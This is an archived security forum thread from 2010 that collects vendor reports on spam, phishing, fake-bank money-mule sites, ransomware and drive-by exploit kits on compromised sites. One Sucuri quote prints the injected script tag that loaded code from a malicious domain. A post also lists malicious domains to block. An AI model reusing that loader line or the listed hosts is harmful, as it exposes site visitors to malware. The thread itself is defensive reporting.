View Full Version : SPAM frauds, fakes, and other MALWARE deliveries - archive

Pages : 1 [2] 3

2010-05-03, 13:37

Fake HijackThis Toolbar from Facebook
- http://www.symantec.com/connect/blogs/hijackthis-toolbar-facebook
May 2, 2010 - "SPAM emails... have been doing the rounds on the Internet hoping to lure recipients into downloading a Facebook toolbar... the file is neither a Facebook toolbar nor HijackThis. It's a malware detected by Symantec software as Trojan.Dropper..."

(Screenshots available at the URL above.)

- http://blog.trendmicro.com/fake-hijackthis-toolbar-serves-malware/
May 9, 2010


2010-05-03, 19:51

Phish/fraud via FedEx delivery...
- http://isc.sans.org/diary.html?storyid=8734
Last Updated: 2010-05-03 13:53:05 UTC - "... got a fedex envelope with an unexpected check over 2'850$, with him as recipient... called the issuing bank... and found out that the account against which the check was drawn had zero funds. The way this works is that the bad guys follow up the first letter with a second, where they apologize for the mistake, ask the victim to "wire back" 2500$ and "keep the 350$ for your trouble". If you go ahead with this, by the time the check bounces, you have wired the money, and wired money is gone or at least very very hard to get back. Given that the crooks incur quite some expense and risk in this scenario (fedex isn't cheap and often traceable back to the source) they must still be making a killing out of this scam. The second scheme is phishing via old-fashioned paper mail. You get a letter stating that "for security reasons" calling the bank now requires a pin code, included below. Follows a pin code of a length and complexity that makes it unlikely anyone would want to remember it, and two lines down, the helpful comment that the pin code can be changed by calling 1-800-whatever. You do so, and here's what happens next:
Voice: Please enter your account number, followed by the pound key [you type]
Voice: Please enter your current telephone access code [you type in the access code in the letter]
Voice: This access code is incorrect. Please try again. [you type - correctly again]
Voice: This access code is incorrect. Please hold for an operator. [you hold]
Operator: XYZ Bank, my name is QRS, how may I help you [you explain]
Operator: To identify you, we have to ask a couple of security questions. What are the last four digits of your social security number ?
Yep. You get the drift. After this exchange, they have everything they need. Lesson learned: Do not ever call "your bank" on a telephone number included in a letter, email or left on your voice mail. Get to know some employees at the bank branch you do business with, and call them with any questions you might have. Recognizing someone's voice beats a "security pin code" any day."

["This machine has no brain.
...... Use your own."]


2010-05-04, 00:59
FYI... "Welcome to: Completely fake Banking online"...

Corporate Identity Theft
- http://www.f-secure.com/weblog/archives/00001945.html
May 3, 2010 - "For online criminals, it's easy to gain access to stolen bank accounts and credit cards. What's much harder is to empty those accounts without getting caught. For this, criminals need money mules: individuals who are recruited to move the money. In many cases these individuals have no idea they are working for organized crime. When phishing and banking trojan victims realize they've lost their money, the tracks will lead to the money mules — not the real criminals. an example of an active money mule recruiting campaign. This one is done in the name of a company called Finha Capital... The website looks fairly credible and quick web search shows that indeed, there is a real company with this name, and it has been operating for decades... The problem is, finha-capital .com has nothing to do with Finha Capital Oy. The site is completely fake. The only reason the website finha-capital .com has been created is to use it as a front end to hire gullible end users to do online payments and to move money for the criminals. These guys are using the reputable brand of an existing company to fool people into their scam. And it's not just Finha Capital... Lessons to be learned?
• Realize that identity theft happens to companies as well as to individuals.
• If somebody offers you a work-for-home position that's too good to be true, it probably is.
• Do not move money for others.
• Check that you're really speaking with who you think you're speaking."

(Screenshots available at the F-secure URL above.)


2010-05-05, 05:36

US Treasury websites compromised
- http://community.websense.com/blogs/securitylabs/archive/2010/05/04/treasury-websites-compromised.aspx
4 May 2010 - "A few of the US Treasury websites were compromised today and loaded a hidden iframe containing exploit code to anyone who visited the following three sites:
* bep .gov
* bep.treas .gov
* moneyfactory .gov ...
This iframe loads a page from gr[REMOVED]ad .com (hosted in Turkey) which in turn redirects to si[REMOVED]e-g .com/jobs/ (hosted in The Netherlands) which is where the exploits are hosted. In this case it's the Eleonore Exploit Kit that is used which has support for several vulnerabilities in Adobe Reader, Flash, Internet Explorer etc... the exploit kit pushes a malicious PDF to the user which exploits a vulnerability in Adobe Reader. At the time of writing only 20% of all AV vendors detected that file*..."

(Screenshots and video available at the Websense URL above.)

* http://www.virustotal.com/analisis/9a274b7d8f7eeadf33b98ebcc9b4c1493e3c3252c7be72b71e8cc08ca1601e63-1272930681
File mal.pdf received on 2010.05.03 23:51:21 (UTC)
Result: 8/40 (20.00%)

U.S. Treasury Site Compromise linked to NetworkSolutions Mass WordPress Blogs Compromise
- http://ddanchev.blogspot.com/2010/05/us-treasury-site-compromise-linked-to.html
May 04, 2010

- http://thompson.blog.avg.com/2010/05/treasury-website-hacked.html
May 03, 2010

- http://pandalabs.pandasecurity.com/usa-treasury-website-hacked-using-exploit-kit/

- http://forums.spybot.info/showpost.php?p=370113&postcount=19
May 5, 2010


2010-05-05, 21:42

iTunes giftcard Phish/SCAM ...
- http://sunbeltblog.blogspot.com/2010/05/steer-clear-of-this-itunes-giftcard.html
May 05, 2010 - "... should the victim hit “Download program”, they’re taken to the endless advert loop of doom from the fake Facebook Hack website*. All in all, a rather horrible thing to fall for – so don’t!"
* http://sunbeltblog.blogspot.com/2010/05/don-be-fooled-by-facebook-hack-website.html
May 05, 2010

(Screenshots available at both URLs above.)

- http://community.websense.com/blogs/securitylabs/archive/2010/05/07/buying-itunes-gift-certificate-malware-spam.aspx
7 May 2010
** http://www.virustotal.com/analisis/0b0b24ca0593723075ef8b103a229b17b86d5b01d624c9ef82c0c74c16ae69ea-1273193875
File ITUNES_C.EXE received on 2010.05.07 00:57:55 (UTC)
Result: 8/41 (19.51%)

- http://www.sophos.com/blogs/gc/g/2010/05/10/danger-fake-50-itunes-certificate-carries-malware/
May 10, 2010


2010-05-07, 18:00

Malicious .SWF file may trigger a DoS attack
- http://blog.trendmicro.com/malicious-swf-file-may-trigger-a-dos-attack/
May 7, 2010 - "... Shockwave Flash (.SWF) file that displays an image and downloads a worm with code capable of initiating a denial-of-service (DoS) attack. The file detected as SWF_PALEVO.KK is hosted on a malicious site and runs whenever users access the site. Once loaded, it displays a screenshot of a YouTube video. The said image, however, is embedded with a malicious link... Clicking the image leads users to a malicious site (http://www.{BLOCKED}com.com/{BLOCKED}layer10.0.45.2.exe) to download a file detected by Trend Micro as WORM_PALEVO.KK. Upon execution, the worm displays a fake dialog box purporting to be an Adobe Flash Player installation with instructions in French. Clicking -any- of the given choices leads to the execution of the malware on the affected system... Apart from infecting users’ systems, however, WORM_PALEVO.KK can also initiate a DoS attack that can disable a website, shut down a network, or disrupt a service. This attack is initiated by a remote server that is controlled by a malicious user. The worm receives commands from the remote server to perform several actions such as downloading other malware, downloading updates of itself, and launching a SYN flood attack against target systems. It can also spread and infect a large number of systems since it propagates using MSN Messenger and peer-to-peer (P2P) applications. The variants WORM_PALEVO.KK and SWF_PALEVO.KK are detections related to the the Mariposa botnet. Users are strongly advised -against- visiting suspicious-looking sites and clicking the links and images found in them..."


2010-05-09, 05:00

Koobface gang... (inside Facebook) scareware serving compromised sites
- http://ddanchev.blogspot.com/2010/05/from-koobface-gang-with-scareware.html
May 08, 2010 - "... Immediately after the suspension of their automatically registered Blogspot accounts, the gang once again proved that it has contingency plans in place, and started pushing links to compromised sites, in a combination with an interesting "visual social engineering trick", across Facebook, which sadly works pretty well, in the sense that it completely undermines the "don't click on links pointing to unknown sites" type of security tips... This active use of the "trusted reputation chain", just like the majority of social engineering centered tactics of the gang, aim to exploit the ubiquitous weak link in the face of the average Internet user... Clicking on this link inside Facebook leads to... a Koobface bogus video...
* Detection rates:
- setup.exe - Mal/Koobface-E; W32/VBTroj.CXNF - Result: 7/41 (17.08%)
- RunAV_312s2.exe - VirTool.Win32.Obfuscator.hg!b (v); High Risk Cloaked Malware - Result: 4/41 (9.76%) ..."

(More detail and info links at the //ddanchev URL above.)


2010-05-09, 18:52

Mothers Day SPAM...
- http://blog.trendmicro.com/spammers-celebrate-mothers%E2%80%99-day/
"May 9 is Mothers’ Day for most countries all over the world. As a perfect gift on this particular holiday, spammers decided to honor mothers by spamming e-cards from supposedly legitimate greeting card companies to distribute their malicious wares... an email in HTML format using a template from Florists’ Transworld Delivery (FTD), a floral wire service... the usual short spam in plain text format with a URL that redirects the user to a malicious site... Though the URLs in the spam are not accessible, users should remember that spammers will try just about anything to encourage people to purchase the products they advertise..."

(Screenshots available at the URL above.)


2010-05-10, 23:07

Google Groups - malicious SPAM...
- http://www.m86security.com/labs/i/Google-Groups-malicious-spam-campaign,trace.1338~.asp
May 9, 2010 - "... large scale spam campaign, with links leading to Fake Anti-virus "scareware". The spam is originating from the Pushdo botnet, which is notorious for these sorts of malicious campaigns. The spam is not that unusual, rather it comes disguised as an 'administrator' message suggesting your mailbox settings need to be updated... The links all lead to various Google Groups pages where files called setup.zip have simply been uploaded by the attackers..."

(Screenshot available at the URL above.)


2010-05-11, 14:45

Fake Win7 compatibility checker - more malware in SPAM...
- http://www.theregister.co.uk/2010/05/11/win7_trojan/
11 May 2010 - "... The malware comes as a zip-based attachment to email messages supposed offering "help" on upgrading Windows boxes. But this "Windows 7 Upgrade Advisor Setup" assistant offers only a Trojan, instead of the promised compatibility checking tool. Windows users who open and run the application end up with systems compromised with a backdoor that allows hackers to insert other viruses and spyware... The main lessons from the attack are that the contents of unsolicited messages are best ignored and, secondly, that virus writers are always trying out new social engineering tricks to dupe the unwary..."


2010-05-17, 17:47

Windows “activation” ransomware
- http://sunbeltblog.blogspot.com/2010/05/windows-activation-ransomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."

(Screenshots available at the URL above.)


2010-05-19, 12:02
FYI... 'suggest BLOCK THEM ALL...

- http://community.websense.com/blogs/securitylabs/archive/2010/05/19/My-Wordpress-blog-got-injected-_2D00_-again_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)

- http://www.malwaredomains.com/wordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...

GoDaddy attacks continue...
- http://blog.sucuri.net/2010/05/continuing-attacks-at-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
You can clean up using this script:
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
May 12, 2010

- http://google.com/safebrowsing/diagnostic?site=kdjkfjskdfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=holasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."

- http://google.com/safebrowsing/diagnostic?site=indesignstudioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=zettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."


2010-05-20, 14:37

Twitter attack - in progress...
- http://www.f-secure.com/weblog/archives/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."


2010-05-21, 21:14

AutoRun worms still alive...
- http://blog.trendmicro.com/new-autorun-worms-utilize-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmicro.com/how-to-maximize-the-malware-protection-of-your-removable-drives/


2010-05-23, 14:19

Beware the trader bearing free gifts...

- http://gizmodo.com/5544593
May 21, 2010 - "... lecturing in the importance of protecting PCs..."

- http://preview.tinyurl.com/2bjdjau
22 May 2010 - "... over 99 different malicious applications were used in this and last weekends attacks."


2010-05-27, 01:01

FIFA fans - Scam targets
- http://blog.trendmicro.com/latest-online-scam-targets-fifa-fans/
May 26, 2010 - "The upcoming “2010 FIFA World Cup” in South Africa is one of the most highly anticipated events in sports history today... two separate SPAM runs leveraging the said event. The first spam sample had a .DOC file attachment that informs recipients of a supposed new contest called “Final Draw” organized in part by the FIFA Organizing Committee. It also tells the recipient of a US$550,000 prize. To claim this, however, the “winner” must immediately coordinate with the releasing agent via the contact information indicated in the email. The email also asks the recipient to give out personal information... This asks recipients to divulge specific information in relation to a fund transfer transaction amounting to a whopping US$10.5 million. Upon agreeing to the proposal, the recipient should supposedly get 30 percent of the said amount. Note that this tactic is reminiscent of the infamous 419 or Nigerian scam, which persuaded users to send cash by promising them a large amount of money in return for their cooperation... In fact, FIFA sternly warned fans of similar online scams*..."
* http://www.pcworld.com/article/197056/FIFA_Tickets.html

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-spammers-raise-their-game
May 27, 2010

- http://www.f-secure.com/weblog/archives/00001964.html
June 9, 2010


2010-05-27, 10:52

44 million stolen gaming credentials uncovered
- http://www.symantec.com/connect/blogs/44-million-stolen-gaming-credentials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."

* http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-052013-2257-99

** http://www.symantec.com/security_response/writeup.jsp?docid=2006-111201-3853-99


2010-05-27, 11:03

Credit union fraud via phish for U.S. Servicemen and Vets
- http://www.symantec.com/connect/blogs/online-fraudsters-catch-us-servicemen-and-veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http :// based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."


2010-05-29, 03:41

boingboing .com spews malware...
- http://news.cnet.com/8301-27080_3-20005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize.com/2010/05/beware-of-boingboingcom-malware.html


2010-05-30, 13:57

Facebook attacked again...
- http://community.websense.com/blogs/securitylabs/archive/2010/05/28/most-hilarious-video-attack-on-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page look like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to login..."
(Screenshots available at the URL above.)

- http://blog.webroot.com/2010/05/28/facebook-spam-leads-to-viagra-vendor-drive-by-download/
May 28, 2010

- http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."


2010-06-02, 02:51

... Top Web Malware in May
- http://blog.scansafe.com/journal/2010/6/1/godaddy-attacks-top-web-malware-in-may.html
June 1, 2010 - "Some interesting stats from May.
• 16196 unique malicious domains.
• The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
• Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
• Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
• Gumblar was the second most prevalent Web malware encountered, at 7%.
• Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.
Top Ten Malicious Domains, May 2010
holasionweb .com* - 7%
www .sitepalace .com - 3%
losotrana .com* - 2%
indesignstudioinfo .com* - 2%
kdjkfjskdfjlskdjf .com* - 2%
easfindnex .org - 2%
findermar .org - 2% - 2%
findrasup .org - 1%
zettapetta .com* - 1%
*Related to attacks against GoDaddy-hosted websites
Top Ten Web Malware, May 2010
Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2% "


2010-06-03, 00:05

Samsung Wave - infected microSD card
- http://www.engadget.com/2010/06/02/samsung-wave-shipping-with-infected-microsd-card/
June 2, 2010 - "Did you get a Samsung Wave today, or perhaps early last week? You might not want to connect it to your computer, just in case. We're hearing anecdotal reports that the 1GB microSD card shipped with certain German units includes a nasty surprise: it automatically installs the trojan Win32/Heur using the file "slmvsrv.exe"...
Update: Samsung HQ got in touch with MobileBurn to confirm the existence of the virus in shipping S8500 Wave handsets, but said that the outbreak was confined to the German market's initial production run and all other shipments are A-OK. Still, there's no harm in disabling autorun before connecting one to your PC, eh?"


2010-06-03, 16:37

FBI Spam ? ...
419 Scam Resurfaces with FBI SPAM
- http://blog.trendmicro.com/spammers-pose-as-fbi-to-send-out-scam-mail/
June 3, 2010 - "Cybercriminals have found yet another way to grab users’ attention. This time, they posed as members of the Federal Bureau of Investigation (FBI) from Washington D.C. to scam users with a spammed message... As in any other scam, the email sender posed as someone from a legitimate body in this attack. The sender claims to be from the FBI. The spam, meanwhile, informs the recipient that he/she is the beneficiary of US$10.5 million. The fake FBI representative then gives the recipient instructions to contact the head of the “Online Transfer Department” of the United Trust Bank London. The said head, urges the email, is the only person who can take responsibility for giving out the promised millions. It even advises the email recipient to strictly follow the instructions in order to make the claim. This, of course, is a hoax. For greater irony and to prove that cybercriminals will go for desperate measures to trick their victims, a note has even been added at the end. This informs the recipient of possible fraudsters who might attempt to deal with him/her. To avoid becoming a victim of such a scam, always pay attention to every detail in email messages you receive. One can easily distinguish what is real and what is fake via careful observation. All you need to do is to carefully observe..."

(Screenshot available at the URL above.)


2010-06-04, 12:08

Twitter malicious SPAM - password reset...
- http://community.websense.com/blogs/securitylabs/archive/2010/06/03/reset-your-twitter-password-spam.aspx
03 Jun 2010 07:18 PM - "Websense... has detected a spam posing as a Twitter Password Reset Notification. We have seen about 55,000 instances of this malicious spam email so far... The spam contains a link to a compromised Web site that, when clicked or pasted into the browser, prompts the user to download a malicious executable named password.exe. The executable turns out to be a rogue AV called Protection Center Safebrowser. What distinguishes this rogue AV from the others is that it actually displays on the user's desktop some of the malicious files it installs. This makes the attack notification more believable. The attack is detected as Trojan.Generic.Win32 (SHA:0b00649c14b96219dd080a0ce6492c4d04c7f45c) and is currently recognized by 19 of the 41 engines on Virus Total*..."
* http://www.virustotal.com/analisis/7aa1b331625dc2d809ead0ddcb802ceea78ba8a7fa2dd411e7a349d8381e9332-1275590333
File 204bec9018693bba6200c0280cf4366e9 received on 2010.06.03 18:38:53 (UTC)
Result: 19/41 (46.34%)

(Screenshots available at the Websense URL above.)


2010-06-09, 14:22

SPAM campaigns send millions of emails
- http://community.websense.com/blogs/securitylabs/archive/2010/06/07/spam-summary-of-last-weekend.aspx
7 Jun 2010 - "Websense... detected 3 spam campaigns with millions of emails...
• Confirm Twitter password, and Twitter security model setup ...
• Facebook account deactivated, or invited by somebody famous ...
• Outlook Setup Notification ...
The statistics... show that spam increased by 15,700 daily on average during the weekend, compared to work days..."

(Screenshots available at the URL above.)


2010-06-10, 15:47

ZeuS SPAM attack spoofs IRS, Twitter, Youtube
- http://krebsonsecurity.com/2010/06/zeus-trojan-attack-spoofs-irs-twitter-youtube/
June 9, 2010 - "Criminals have launched an major e-mail campaign to deploy the infamous ZeuS Trojan, blasting out spam messages variously disguised as fraud alerts from the Internal Revenue Service, Twitter account hijack warnings, and salacious Youtube.com videos. According to Gary Warner, director of research in computer forensics at the University of Alabama, Birmingham, this latest attack* appears to be an extension of a broad malware spam campaign that began at the end of May. The fake IRS e-mails arrive with the tried-and-true subject line “Notice of Underreported Income,” and encourage the recipient to click a link to review their tax statement. All of the latest e-mails use a variety of URL shortening services... Warner said anti-virus detection for this malware is extremely low: Only three out of 40 different anti-virus products detected the file as malicious**, yet none of those currently identify it for what it is: Another new version of the ZeuS Trojan. These broad attacks usually are quite successful, and in the past they have been used to great effect by the same criminal gangs that have been stealing tens of millions of dollars from small to mid-sized businesses..."
* http://garwarner.blogspot.com/2010/06/irs-malware-notice-of-underreported.html
June 08, 2010

** http://www.virustotal.com/analisis/9ab48099e99fe48d6b0bcfa2a78d2f58f274b3bc3b9edfaf96dcbaeb619cdc96-1276042845
File 1276042605.tax-statement.exe received on 2010.06.09 00:20:45 (UTC)
Result: 3/40 (7.50%)


2010-06-10, 18:33

SCAMS - Gulf oil spill ...
- http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt058.shtm
06/09/2010 - "... The Federal Trade Commission... cautions consumers and businesses to be on the alert for fraudulent activity related to the explosion aboard the Deepwater Horizon drilling rig and the resulting spill – and to report their experiences to federal and state authorities. British Petroleum (BP) leased the rig, which was owned and operated by Transocean. The FTC says it’s likely that scammers will use e-mails, websites, door-to-door collections, flyers, mailings and telephone calls to make contact and solicit money. Some may claim they’re raising money for environmental causes or offer fraudulent services – like remediation services – related to the oil spill. Others may claim they can expedite loss claims for a fee. Still others may knock on your door and talk about placing booms or checking for oil on your property. Chances are they’re trying to gain your trust to get inside your home or get access to your personal information. The FTC says that at the very least, you will want to do some homework before making a donation or entering into an agreement for services..."
- http://www.ftc.gov/charityfraud/

(More detail at -both- FTC URLs above.)

Also see:
- http://www.avertlabs.com/research/blog/index.php/2010/06/09/peering-into-the-affiliate-marketing-window/

- http://www.infosecurity-us.com/blog/2010/6/7/135-000-fake-youtube-pages-delivering-malware/168.aspx
June 7, 2010 - "... Attempting to play the video on these fake pages prompts the user to install a ‘media codec’ which then infects the machine with malware... fake YouTube pages are well crafted and look almost identical to the real site. By using websites like YouTube, cyber criminals are taking advantage of a users’ inherent trust in the site and are able to infect more machines. Each page claims to have a “Hot Video” associated with anything from the Gulf Oil Spill to the NBA Playoffs. Google search results show 135,000 of these infected pages at the time of writing..."


2010-06-14, 18:30

More World Cup scams, SPAM, etc...

- http://sunbeltblog.blogspot.com/2010/06/world-cup-visa-phishers-come-off-bench.html
June 14, 2010

- http://www.symantec.com/connect/blogs/fifa-world-cup-watch-all-matches-free-adult-video-site
June 13, 2010

- http://www.sophos.com/blogs/sophoslabs/?p=10015
June 11, 2010

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-and-cybercrime-end-user-survey
June 10, 2010- "... best practices:
• Don’t open unsolicited e-mails or social media messages purporting to contain special offers or extraordinary deals related to the World Cup, and especially don’t click on any links in such messages.
• If an online offer appears to be too good to be true, it probably is. Scammers often try to make their bogus offers sound so great that they would be nearly impossible to pass up…if they were real that is.
• Be careful about what “official” social networking accounts you follow, such as those that appear to be created by World Cup teams or players. Often, cybercriminals will create accounts posing to be someone they’re not.
• When searching for online video of the World Cup, avoid sites you’ve never heard of before and if you’re told you must update your media player before viewing a video, be very cautious as this might be a ploy by attackers to get you to download malware..."

- http://pandalabs.pandasecurity.com/extreme-sports-2010-fifa-world-cup-bhseo-attack/


2010-06-15, 16:16

Twitter - PDF exploit SPAM run... in progress
- http://sunbeltblog.blogspot.com/2010/06/pdf-exploit-spamrun-on-twitter.html
June 15, 2010 - "There appears to be a bit of a mad dash to infect people by the boatload on Twitter, with a variety of different messages being sent to random targets... account endlessly says “Wow, a marvelous product”. Click the link, and you might be redirected to some sort of paid movie service... If you’re unlucky, however, you’ll end up at a URL such as fqsmydkvsffz(dot)com/tre/vena(dot)html, where PDF exploits await... phrases used for this spamrun include:
Wow, An incredible Product
Wow, A shocking Discovery
Watch This
I Just Cant Beleive This
Wow, A stunning Product
Wow, A Revolutionary Product
Wow, A fascinating Site
This isn't the first malicious spamrun on Twitter, and it certainly won't be the last. With that in mind, it might be best to avoid random links sent to you from strangers. You never quite know what’s at the other end."


2010-06-17, 16:10

.gov site hosts Phish - UK banks
- http://sunbeltblog.blogspot.com/2010/06/gov-website-plays-host-to-uk-banking.html
June 16, 2010 - "... something rather nasty on the Central Department .gov portal which can be found at central(dot)gov(dot)py... fourteen different banking / financial services phishes including Barclays, Abbey, Northern Rock, Halifax and Lloyds TSB. Clearly, someone is desperate to get their hands on as many UK banking credentials as possible. These phishes are all online at the moment although some appear to be flagged in browsers such as Firefox. We’ve contacted the hosts and hopefully all of the above will be offline shortly."

(Screenshots available at the Sunbelt blog URL above.)


2010-06-22, 02:41

GoDaddy Scam/Phish/Spam
- http://isc.sans.edu/diary.html?storyid=9043
Last Updated: 2010-06-21 23:20:29 UTC - "A number of readers (and myself included) have received an email claiming to be from GoDaddy. The email is grammatically correct, and appears quite genuine. The subject is "GoDaddy.com Order Confirmation" and interestingly the images within the HTML are pulled from imagesak.godaddy.com, excepting one which came from "hxxp ://img.securepaynet.net/bbimage.aspx?pl=somecodeandmyemailaddress". The links in the emails I have seen point to "hxxp ://dextersss-com-ua.1gb.ua/zzx.htm" among others. The phishing site and IP address and domain registration are in the Ukraine."


2010-06-22, 21:46

Lenovo Support website loads malicious IFrame, infects visitors with Trojan
- http://cyberinsecure.com/lenovo-support-website-loads-malicious-iframe-infects-visitors-with-trojan/
June 22, 2010 - "The support site of leading Chinese PC manufacturer Lenovo has been compromised by unknown attackers who injected a rogue IFrame into the pages over the weekend. Security researchers warn that unwary visitors looking for drivers are exposed to several exploits that install the Bredolab trojan onto their computers. According to a report from Vietnamese antivirus vendor Bkis, the pages have been infected since at least Sunday afternoon. However, some users have been reporting getting antivirus warnings when visiting Lenovo’s download website since Saturday. The IFrame points to an exploit kit hosted on a domain called volgo-marun .cn. After performing several checks to determine what vulnerable software they had installed on their computer, the visitors were served with exploits targeting older versions of Internet Explorer, Adobe Reader or Adobe Flash player... At the moment, the malicious executable is detected by only ten of the 41 antivirus products listed on VirusTotal. The entire download.lenovo .com subdomain has been blacklisted by Google’s Safe Browsing service. This means that Firefox or Chrome users should see malware warnings when opening resources hosted on it... Even though the malicious .cn domain appears to be dead at the moment, it could return back online at any time. Therefore, users are advised to stay clear of the Lenovo support website for a couple of days, until the manufacturer has a chance to clean it up and plug the hole that allowed the compromise in the first place."


2010-06-23, 13:55

"Account Verification" - Malicious SPAM
- http://community.websense.com/blogs/securitylabs/archive/2010/06/22/malicious-spam-campign-account-verification.aspx
